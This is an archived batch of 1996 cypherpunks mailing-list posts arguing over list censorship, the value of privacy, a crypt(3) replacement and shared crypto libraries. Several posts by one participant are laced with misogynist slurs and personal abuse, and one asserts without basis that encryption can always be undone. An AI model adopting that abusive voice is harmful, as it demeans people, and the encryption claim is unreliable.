
What we're REALLY interested in, is exposing fallacies about
Freedom of Speech when "private mailing lists" are the biggest threat
to it, nowadays, ever since the Net was invented.

I will pass this on to relevant people and see what happens.

Sincerily
George A. Stathis

P.S. already cross-posted this to "Eleftherotypia", perhaps the biggest
     and most democratic-minded newspaper in Athens, Greece.
     (if it bounces, I got the address wrong and will resend).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 16:25:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Giving Kill Files a Workout...
Message-ID: <199611170424.CAA09647@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 06:52 ìì 16/11/1996 EST, Dr.Dimitri Vulis KOTM wrote:
>> Thank you in advance for your filtering instructions (yawn).
>>
>> BTW, why would anyone give a shit whether you killfiled anyone or not?
>
>But, Dale, that's the whole point of censorship: people like Alan Olsen
>and John Gilmore and Jim Ray aren't satisfied when they've killfiles a
>source of noise they consider annoying so it doesn't bother them anymore.
>They feel compelled to silence it altogether. They claim altruistically
>that they don't want the noise to bother anyone else, such as the clueless
>newbies who keep subscribing to this mailing list and don't know how to
>use mail filters. (Sandy Sanford's concern for them was soooo touching...)


Rather infuriating, too, that newbies are PATRONISED. It's well known
among my own circle that forcible expulsions from mailing lists serve
the purpose of controlling the information-flow to _newbies_ mostly;
since hard-liners and experts know how to killfile anyone anyway...

But sometimes, in other mailing lists, "killfile-terrorism" appears,
meaning an attempt to influence EVERY newbie into killfiling someone
whose messages are no longer read, but the messages of his critics
are read.

It's a return to the MIDDLE AGES, because it means that the words of
the prosecutor are heard, but the defense of the accused is deleted.

Greek friends and I have been studying this Mechanism of Repression
for rather a long time. It's probably encouraged by the EFF, too, in
the sense that (the goal is): Turn the Internet into cows and sheep
flocked together by pimp-cowboy list-owners.

It nearly turned me into a Yankee-hater till I realized there are
quite a few open-minded Americans similarly infuriated and concerned.

One Net-friend of mine (an American lady) has a doctorate in History
and Law and remarked that FEW PEOPLE IN THE STATES REALIZE WHAT THIS
IS ALL ABOUT, and how EASY it is for the freedom-bashers to succeed.

Lastly, I have now read nearly ALL of Dimitri Vulis' postings (in
the F-K list), and consider it CRIMINAL censorship if anyone tries
to stop him from speaking out. His talent at exposing fallacies is
magnificient.

This is the beginning of the END of pimping-on-the-net in the
name of "privacy".

George






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 17 Nov 1996 00:25:06 -0800 (PST)
To: "Joshua E. Hill" <jehill@w6bhz.calpoly.edu>
Subject: Re: RFC: A UNIX crypt(3) replacement
Message-ID: <1.5.4.32.19961117112455.003ac9d4@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:51 PM 11/16/96 -0800, "Joshua E. Hill" <jehill@w6bhz.calpoly.edu> wrote:
>	I'm trying to think of a function to replace UNIX's crypt(3).  
>My design criteria are as follows:
...
>NMAC(k, m) = H(k1, H(k2, m))
....
>Would (n . P . n ) be better?

NMAC is probably a bit stronger, but the real question is why
you want to reinvent crypt(3).  It was fine for logging in from a
hardwired or dialup dumb terminal, but in a network environment you
really need some sort of one-time password system.  S/Key, for instance.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 17 Nov 1996 01:12:58 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: The Utility of Privacy
In-Reply-To: <199611170222.SAA10990@mailmasher.com>
Message-ID: <Pine.SUN.3.94.961117041113.2926A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Huge Cajones Remailer wrote:

> Date: Sat, 16 Nov 1996 18:22:33 -0800
> From: Huge Cajones Remailer <nobody@huge.cajones.com>
> To: cypherpunks@toad.com
> Subject: The Utility of Privacy
> 
> 
> Privacy is a hassle.  Is it worth it?
> 
> Which unfortunate situations does privacy prevent?  What are the odds
> that they will occur?  How much effort will it take to prevent these
> outcomes?  As a model, use the present and future situation of a
> typical reader of this list.

Insurance is a hassle.  Is it worth it?

Which unfortunate situations does insurance prevent?  What are the odds
that they will occur?  How much effort will it take to prevent these
outcomes?  As a model, use the present and future situation of a
typical reader of this list.


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sat, 16 Nov 1996 18:48:55 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Giving Kill Files a Workout...
Message-ID: <199611170647.EAA14563@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 03:52 ìì 16/11/1996 -1000, Dr. Jai Maharaj wrote:
>A member of the international press who is traveling with
>President Clinton during his vacation here asked me earlier
>today, "How's the Internet doing, got a story for me?"  I think
>I may suggest the issues being discussed here.  Perhaps non-
>governmental-censorship matters have not received enough
>attention in the mass-media yet.

Quite true, and the same thing I was told by the Chief-Editor
of "Info" (the weekly Internet-supplement of a prominent Greek
journal -Eleftherotypia).

One last comment is important here:

******************************************************************
If the 'neo-liberal' ideology of EVERYTHING becoming 'privatised'
succeeds, then non-governmental censorship is MUCH more important
the governmental censorship.
******************************************************************

The Internet is a threat to the 'traditional' role of the media,
and 'list-owners' try tp behave like patronising conventional
newspaper-editors. All the filth that was hidden in the closet
of the journalistic profession comes out, as a result, in the
Net. These people want to _model_ mailing lists after journals
-ironically at a time when many journalists are free to write
what they like sometimes against the opinions of the journal-owners.

Perhaps our only hope is that... Freedom sells.

George







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 17 Nov 1996 02:10:24 -0800 (PST)
To: "George A. Stathis" <hyperlex@hol.gr>
Subject: Re: Does John Gilmore...
In-Reply-To: <199611171150.JAA23268@prometheus.hol.gr>
Message-ID: <Pine.SUN.3.94.961117050102.3022F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, George A. Stathis wrote:

[...]

> As regards 'PGP'...
> I don't give a damn anymore who reads my mail, since I got used
> to infringements of privacy anyway (since my childhood days in
> a dictatorship).

[...]

> P.S. I have heard cynical Americans before, being 'sarcastic' against
>      selfless supporters of Free Speech. A lot of you people can't
>      even imagine a selfless cause without financial gain. Such is
>      the... Mafia world of... pimping and prostitution, I suppose... :-)     
> (-joke!) ROTFL

The problem with people too used to dictatorships is that they grow
so accustomed to taking those favors and incentives which are dictated to
them that the freedom (and responsibility) of "financial gain" seem like
too much work.

Much easier to just work for food.  "The all-knowing General Pinoriega
would have given us money if we needed it."

Of course the result is an increased dependence on the state.

Market economies which approach true "free market" status provide no
foothold for regulation.  You cannot really have one without the
other.  (Note the coming backlash against free speech and free markets in
the United States).

The free market will ever be the only real path to free speech, because,
in essence, it is free speech.

Free speech does not, however, require that all speech be universally
broadcast to each and every citizen on the planet free of charge.  That's
"subsidized speech."

Consider long and hard if that is the path that you would like to take.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 17 Nov 1996 05:50:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Could Declan or some libertarian explain this?
Message-ID: <199611171336.FAA16570@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:

>Could someone explain to me why we have to have *any* censorship, if
>people on a list are given tools to filter with and reminded on occasion
>how to use them?

You are the reason, you can't shut up and you have little or nothing to say. plonk.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sat, 16 Nov 1996 11:11:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The persistance of reputation
In-Reply-To: <328D2595.89B@gte.net>
Message-ID: <199611161644.FAA08442@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996 18:23:17 -0800, Dale Thorn wrote:

   A disinformer posing as an idiot.  Go figure.

Nice sig...and here I was thinking you were a real idiot.

<g>

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Deliberation, n.:
	The act of examining one's bread to determine which side it is
buttered on.
		-- Ambrose Bierce, "The Devil's Dictionary"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@adsl-122.cais.com>
Date: Sun, 17 Nov 1996 02:52:17 -0800 (PST)
To: hyperlex@hol.gr (George A. Stathis)
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <199611171100.JAA21839@prometheus.hol.gr>
Message-ID: <9611171051.AA05251@adsl-122.cais.com>
MIME-Version: 1.0
Content-Type: text


George A. Stathis wrote:
> 
> This was my objection also inside the F-K list, for _some_ of the postings
> in the past, but none of these postings was connected with acts of
> censorship, or with "sweeping generalisations" without evidence. On several
> occasions that I searched and found who or what they were talking about,
> I discovered they were talking about people whose activities were indeed
> horrifying (forged cancellations etc) and who also fought back.

Horrifying eh? Hmm I found this just a bit to priceless to resist.
I guess it falls under the old 'but I'll defend your right...' way
of looking at things...

In any case, here you go, this is the latest contribution of software
from Dimitri to the values of freedom of expression and non-censoring
& all that blather.

#From Phrack 49, file p49-09 published this month:
                            .oO Phrack Magazine Oo.

                        Volume Seven, Issue Forty-Nine
                        
                                 File 09 of 16

                          by Dr.Dimitri Vulis (KOTM)

               A Content-Blind Cancelbot for Usenet (CBCB)

And what follows, is Dr. Dimitri, defender of freedom of expression,
champion of the anti-censors on the net, posting code to the world to
engage in exactly those activities that everyone has been ranting about
as being so utterly "horrifying (forged cancellations etc)" as it were.

Amusing to say the least.

Tim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 17 Nov 1996 04:19:42 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961116074506.1181B-100000@kinch.ark.com>
Message-ID: <Pine.LNX.3.95.961117071330.25183B-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Dave Kinchlea wrote:

> Date: Sat, 16 Nov 1996 08:08:39 -0800 (PST)
> From: Dave Kinchlea <security@kinch.ark.com>
> Reply-To: freedom-knights@jetcafe.org
> To: aga <aga@dhp.com>
> Cc: InterNet Freedom Council <ifc@pgh.org>, freedom-knights@jetcafe.org,
>     cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> On Sat, 16 Nov 1996, aga wrote:
> 
> > On Fri, 15 Nov 1996, Dave Kinchlea wrote:
> > 
> > > 
> > > So, you send all of your snail mail on post cards do you? No
> > > sealed envelopes at all? Afterall you have nothing to hide, right?
> > > 
> > 
> > Irrelevant analogy; snail.mail and e-mail.  The former is in physical
> > form, and the latter usually never is.
> 
> No kidding, thanks for that information. Perhaps you can explain how it
> is relevant?
> 

it is not -- I said irrelevant.

> > 
> > > Of course not, privacy isn't about being a criminal, its about being
> > > private. It is not akin to anonymity, *perhaps* those who work
> > > anonymously have `something to hide' (still doesn't necessarily make
> > > them a criminal, however), 
> > 
> > Anonymity on the InterNet is a Constitutional right, and is the
> > sole supporter of freedom of speech.
> 
> Another irrelevant and completely inaccurate point. I utilize free
> speech everyday yet I manage to do it without anonymity. 
> 
> > 

so? that is you. but if a motherfucker wants to be anonymous, he
must be allowed; there is no exception to the rule.

> > > I'll let someone else field that as I feel
> > > that anonymity is rarely a good thing. 
> > > 
> > 
> > I disagree, anonymity is a good thing that will never
> > be questioned by anybody, but your PGP will, and it
> > is really not safe anyway.
> 
> ha ha ha, not by anybody huh. What world do you live in? I know plenty
> of people who feel that if you must say something anonymously `you must
> be hiding something, probably a criminal!'. I don't subscribe to this, I
> feel that most people who post anonymously are just chicken-shits, but
> that too is besides the point. It *is* questioned by many people.
> 

fuck them.

>  And as to PGP not being safe, perhaps you could expand a bit on this,
> it hasn't hurt me or anyone I know, seems pretty safe to me. To address
> what I assume your point was, it acts as a prefectly good sealed
> envelope (and I believe quite a bit more), in the context of my original
> reply, this is quite `safe'.
> 

never ever rely on something being encoded and not able to be
unencoded, that is not possible.  whatever man can do, man can
undue, and that is a law of nature that has no exception.

> > 
> > > Privacy, on the other hand, simply means that not everything I do is any
> > > of your business and I would just as soon you not be tempted to even
> > > bother trying to find out. 
> > > 
> > 
> > If you do not send it to me by e-mail, I will never see it.
> 
> Nor will you see my post-card that I send to my mom, how does that
> change the nature of a post-card OR email?
> 
> > Why are you so paranoid that someone is reading your e-mail?
> 
> Paranoid? No, but why make it easy for anyone to do so? 
> 
> > I never do anything criminal, so I could give a shit less if
> > everybody reads all of my fucking mail.
> 
> so how is it different, besides being electronic, from snail mail? I
> repeat, why don't you use post-cards exclusively for mail? Oh yes, that
> is `print', a totally different thing, geesh.
> 

no, you just need envelopes for multiple pages.

> > 
> > > Of course, if all of your personal mail (including financial statements
> > > etc) is sent on post cards, then (while I think you would be crazy) I
> > > will at least admit you are consistent. Else, I think you need to look
> > > hard at the logic you are using.
> > > 
> > 
> > Again, inconsistant analogy.  This is nothing but photons in it's
> > ultimate form, and it will never see paper.  Anything that _you_
> > print is not attributable to me, and any e-mail printed by you
> > would never be acceptable as a court exhibit.
> 
> You appear to be confused, I look at what I wrote and I see nothing at
> all that mentions courts. I am talking about personal privacy and the
> analogy is not at all inconsistent. (and paper mail is nothing but atoms
> in it's ultimate form, so what?)
> > 

You have it. Just never print anything.

> > stop getting cyberspace mixed up with print.
> 
> Why do you think there is something magical about `cyberspace'? Privacy
> is privacy, period. Communication is communication, period. There is no
> reason to differentiate private communication via print and private
> communication via cyberspace. Both are desirable for exactly the same
> reasons. 
> 
>  > 
> > why do you put that cypherpunks address in the header?
> > just where did this e-mail originate from?
> 
> Thats how it landed on my plate, thats where I send it back, seems
> reasonable to me.
>  

Yeah, but some motherfucker is sending this shit to that list
I think.  What a fucking joke that is.

> cheers, kinch
> 
> 
 cheers,

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila@primenet.com
Date: Sat, 16 Nov 1996 23:46:17 -0800 (PST)
To: Dale Thorn <cypherpunks@toad.com>
Subject: Re: San Jose Mercury News declares encryption battle over
In-Reply-To: <328E8BEC.2D76@gte.net>
Message-ID: <199611170747.AAA27780@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <328E8BEC.2D76@gte.net>, on 11/16/96 
   at 07:52 PM, Dale Thorn <dthorn@gte.net> said:

::Point 2: I've said something like this before, but here's a place where
::it could mean something.  If c-punks and others could divvy up as many
::of the supporting functions of "strong" crypto as possible, and issue
::them in a set of commonly-available libraries for any and all programmers,
::along with source code, then an application programmer (theoretically)
::could order up some of these libraries and write some useful crypto code
::in short order.  
::
        one of the best proposals in many years --we have all made good 
    use of library code over the years, unless the simpleton coder has a
    obsessive-compulsive masochistic need to write an extra 20-50,000 
    lines of 'reinvent the wheel' code.

        there are several linkable libraries floating around, with 
    multiple types, etc.  the only one I looked at a couple of years
    ago needed some extensive work on its calling and return
    conventions --ever hear of structures?

::This would be much better than taking on thousands of
::lines of source code directly.  This would also allow several vendors to
::issue similar libraries, and surely someone on the Net could arrange
::for comparitive product reviews.

::This way, once you have a product up and running, if you (for example)
::would like to replace the XYZ function with something a little better,
::without impacting the rest of the code, you could order a replacement
::for that function and plug it in, perhaps with no code modifications.
::
        ah, yes.  reusable code for disposable programmers!

        and, I agree with the premise on widespread free distribution
    add sand to the governent grease.  make sure every college has 
    complete project kits for free and we will have a new generation of
    expert cryto-application programmers within 5 years. 
        
        needless to say,the workbook needs to mix in a subtle dose of
    freedom of speech, &c.  don't espouse our usual anarchy, etc. or 
    the school admins (always on the leaing edge of the liberals) will
    have none of it.

        every one else puts in for government money to fund these kind
    of developments --make them their junk, but lose it all at 
    distribution --or have a separate organization deal with the 
    logistics.  once you have the product, and for every platform, the
    rest of it is standard word-of-mouth, something for nothing, and
    "fun."  call the package 'voodoo' and ship with a doll fashioned 
    after Bubba  --prestuck with pins.

            -attila

- --
        maybe there is an analogy:

        militias:       the only way they'll take my weapon
                        is from my cooling, smoking hand....

        prez:           the only way they'll take my executive privileges
                        is to vote me out of office --IF I consent to leave.

                <attila>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMo7CHb04kQrCC2kFAQHgLAP+MjgD0/ekgiQF1VBkhWQ+JOG0PrYRXg+p
F+l8zViJAigJbYwGxRlDEYm4Kl8z1ktNigLlr6t0uPbEmX4c5KPtDl4tEokrTsMk
uxLz8GB6zlKBGuDoBylbGNIGYUTXWaNhYcFL8bOcu+uRSAETsaAiPKynEkwFsigU
bgFenDTzMhc=
=1K7E
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 17 Nov 1996 04:36:13 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: AGA'S LIMITED VOCABULARY
In-Reply-To: <Pine.SUN.3.91.961116083904.19901E-100000@crl4.crl.com>
Message-ID: <Pine.LNX.3.95.961117072058.25183C-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Sandy Sandfort wrote:

> Date: Sat, 16 Nov 1996 08:51:37 -0800 (PST)
> From: Sandy Sandfort <sandfort@crl.com>
> To: aga <aga@dhp.com>
> Cc: cypherpunks@toad.com
> Subject: Re: AGA'S LIMITED VOCABULARY
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 

Now just one moment cunt.  This ain't cyberpunks.
I never joined that motherfucking list.  If you want
to talk to me, you dump the motherfucking list.  That
fucking list is a waste of time, and I ain't going to
reply to any of those assholes any more.

If you want to talk to me, you go to the Freedom-Knights
or the InterNet Freedom Council ONLY.

> On Sat, 16 Nov 1996, legal expert aga wrote:
> 
> > ...cypherpunks is an "all or nothing" proposition...After a
> > certain level, EVERYTHING reaches the "public doamin," and that
> > is the *common-law of cyberspace.*
> 
> As I'm sure aga knows, "common law" is that form of jurisprudence 
> in which cases of first which are appealed to a higher court set
> legal precedents which are subsequently binding on lower courts.
> 
> I must admit, it appears "Aga" has the advantage of me, as I did
> not study the *common-law of cyberspace* back when I was in law
> school.  (Unfortunately, my education pre-dates the existance of
> cyberspace.)
> 

What year did you graduate from Law School?

> As a favor to me and other's on the list who would like to know
> as much as "Aga" does about the *common-law of cyberspace* I ask
> "Aga" to please share his knowledge with us.  For starters, a 
> list of the most relevant appelate cases embodied in the *common-
> law of cyberspace* would be appreciated.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 

Just how old are you, Sandy?

Again, we dump the stupid fucking list, or I don't talk
with you any more.

out,

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sun, 17 Nov 1996 04:40:56 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Fuck You Dumb Cunt
In-Reply-To: <Pine.SUN.3.91.961116081612.19901D-100000@crl4.crl.com>
Message-ID: <Pine.LNX.3.95.961117073649.25183D-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Sandy Sandfort wrote:

> Date: Sat, 16 Nov 1996 08:37:14 -0800 (PST)
> From: Sandy Sandfort <sandfort@crl.com>
> To: aga <aga@dhp.com>
> Cc: Cypherpunks <cypherpunks@toad.com>
> Subject: Re: Does John Gilmore...
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Sat, 16 Nov 1996, aga wrote:
> 
> > The cyberpunks mailing list is PUBLIC property and should NOT
> > be controlled by John Gilmore!  This just goes to show the real
> > facist censorship motives that the EFF has behind it.
> 
> I have a suggestion for "Aga" and others who believe this sort of
> nonsense.  Please do us all a favor and try to sue John.  I'm sure 
> that among all jack-leg and wannabe lawyers on this list that they
> can come up with a viable cause of action.  And John has deep 
> pockets; you could (literally) make out like bandits AND rescue 
> "freedom of speech" on privately maintained mailing lists.  You 
> could be heroes (or look ten times as foolish as you already do).
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 

fuck you dumb cunt.  I told you to leave that list off of your
fucking headers -- you just do not listen, do you?

Anybody that supports John Gilmore is an asshole bitch or cocksucker
one of the two.

out.

-a





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 17 Nov 1996 07:54:23 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: AGA'S LIMITED VOCABULARY
In-Reply-To: <Pine.LNX.3.95.961117072058.25183C-100000@dhp.com>
Message-ID: <Pine.SUN.3.91.961117072848.20717D-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks and others,

On Sun, 17 Nov 1996, aga wrote:

> Now just one moment cunt. 

Colorful, yet sadly ineffectual.  

> This ain't cyberpunks.

No, it's Cypherpunks (and others).  
         ^^^^^^^^^^^
> I never joined that motherfucking list. 

Perhaps you are laboring under a misconception.  Cypherpunks is
about the use of technology to protect privacy.  Perhaps you 
were confusing it with that other list you are on:
alt.sex.yourmother.

> If you want to talk to me, you dump the motherfucking list. 
> That fucking list is a waste of time, and I ain't going to
> reply to any of those assholes any more.

Let me guess; you weren't an English major, right?

> If you want to talk to me, you go to the Freedom-Knights
> or the InterNet Freedom Council ONLY.

Thanks for your suggestion.
 
> What year did you graduate from Law School?

Irrelevant, but it was 1975.  More importantly, though, when did
YOU graduate from law school?
 
> Again, we dump the stupid fucking list, or I don't talk
> with you any more.

Kind of funny that you included Cypherpunks in YOUR reply, but
don't want me to.  I guess you prefer having a captive audience
of your cronies.  "Freedom Knights" yeah, right.  

So given your above ultimatum, I guess you are going to weasle
out of sharing your vast legal knowledge with us as per my 
request.  To wit:

> > As a favor to me and other's on the list who would like to know
> > as much as "Aga" does about the *common-law of cyberspace* I ask
> > "Aga" to please share his knowledge with us.  For starters, a
> > list of the most relevant appelate cases embodied in the *common-
> > law of cyberspace* would be appreciated.

What a pity.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 17 Nov 1996 07:56:04 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: Fuck You Dumb Cunt
In-Reply-To: <Pine.LNX.3.95.961117073649.25183D-100000@dhp.com>
Message-ID: <Pine.SUN.3.91.961117074708.20717E-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks and others,

On Sun, 17 Nov 1996, aga wrote:

> > I have a suggestion for "Aga" and others who believe this sort of
> > nonsense.  Please do us all a favor and try to sue John.  I'm sure 
> > that among all jack-leg and wannabe lawyers on this list that they
> > can come up with a viable cause of action.  And John has deep 
> > pockets; you could (literally) make out like bandits AND rescue 
> > "freedom of speech" on privately maintained mailing lists.  You 
> > could be heroes (or look ten times as foolish as you already do).

> fuck you dumb cunt. 

Boy, have you got a wrong number.  

> I told you to leave that list off of your fucking headers --
> you just do not listen, do you?

You sure have a problem with free speech, don't you?  I read what
you wrote and ignored it.  I sure feel sorry for any woman who
gets involved with me ("I SAID, get me a beer, bitch!)
 
> Anybody that supports John Gilmore is an asshole bitch or
> cocksucker one of the two.

Yet I am neither.  Perhaps you are in error.

Bye,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 17 Nov 1996 05:08:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <328E9EB6.539E@ix.netcom.com>
Message-ID: <XcgJXD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <rcgraves@ix.netcom.com> writes:

> Omegaman wrote:
> >
> > On Wed, 13 Nov 1996, Declan McCullagh wrote:
> >
> > > Yes, I understand this. It's quite obvious; being removed from the
> > > subscriber list hasn't slowed Vulis at all. When I was writing the piece
> > > Vulis seemed to have slowed his ad hominem attacks and instead was talkin
> > > about censorship (something that is within the charter of the list), but
> >                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >
> > Actually, Declan, it's not.  "info cypherpunks" in the body of a message to
> > majordomo@toad.com yields the welcome message to the list -- the closest
> > thing to a charter available.  The subjects of censorship and free speech
> > are neither mentioned nor alluded to anywhere within that document.
>
> This is true.
>
> Declan's "fight-censorship" list, though, is supposed to be about censorship,
> and he's allowing no criticism of his positions there.

He's exercising his property rights at the expense of his credibility.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sun, 17 Nov 1996 08:12:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611171612.IAA01572@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 4:11 AM 11/17/1996, Black Unicorn wrote:
>On Sat, 16 Nov 1996, Huge Cajones Remailer wrote:
>
>> Date: Sat, 16 Nov 1996 18:22:33 -0800
>> From: Huge Cajones Remailer <nobody@huge.cajones.com>
>> To: cypherpunks@toad.com
>> Subject: The Utility of Privacy
>> 
>> 
>> Privacy is a hassle.  Is it worth it?
>> 
>> Which unfortunate situations does privacy prevent?  What are the odds
>> that they will occur?  How much effort will it take to prevent these
>> outcomes?  As a model, use the present and future situation of a
>> typical reader of this list.
>
>Insurance is a hassle.  Is it worth it?
>
>Which unfortunate situations does insurance prevent?  What are the odds
>that they will occur?  How much effort will it take to prevent these
>outcomes?  As a model, use the present and future situation of a
>typical reader of this list.

I know many people who were happy they had insurance due to car
accidents, health problems, or whatever.  What is more, the odds of
these events are carefully calculated and available.  Call an actuary.

Are there similar sources of information calculating privacy risk?  I
don't think so.

Informally, I don't know anybody who has suffered due to a loss of
privacy.

It may be the case that it is politically beneficial to have a society
of privacy fanatics.  But, this is different from the direct benefit
to each participant.

My question remains unanswered, probably because privacy isn't worth
the effort.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Sun, 17 Nov 1996 08:23:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611171623.IAA02492@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:49 PM 11/16/1996, Hal Finney wrote:
>David Brin has an article in the December issue of Wired arguing that
>privacy is obsolete and was never that great an idea in the first place.

>Maybe you'd say that all of these people should expose their secrets, or have
>them exposed for them, and that the world would be a better place. (Actually,
>you do seem to say this, and I'll discuss it later.)

>I really don't think we have any right to second-guess the decisions people
>have made about what they will reveal and what they will keep private.

This is not my claim.  If free citizens go to the trouble of
protecting their privacy, good for them.

How important is it that I should do so?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 17 Nov 1996 05:49:42 -0800 (PST)
To: attila@primenet.com
Subject: Re: San Jose Mercury News declares encryption battle over
In-Reply-To: <199611170747.AAA27780@infowest.com>
Message-ID: <199611171346.IAA02035@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


	I agree wholeheartedly.  In fact, to make it easier to find
libraries, I created a page with links to 7 libraries with at least
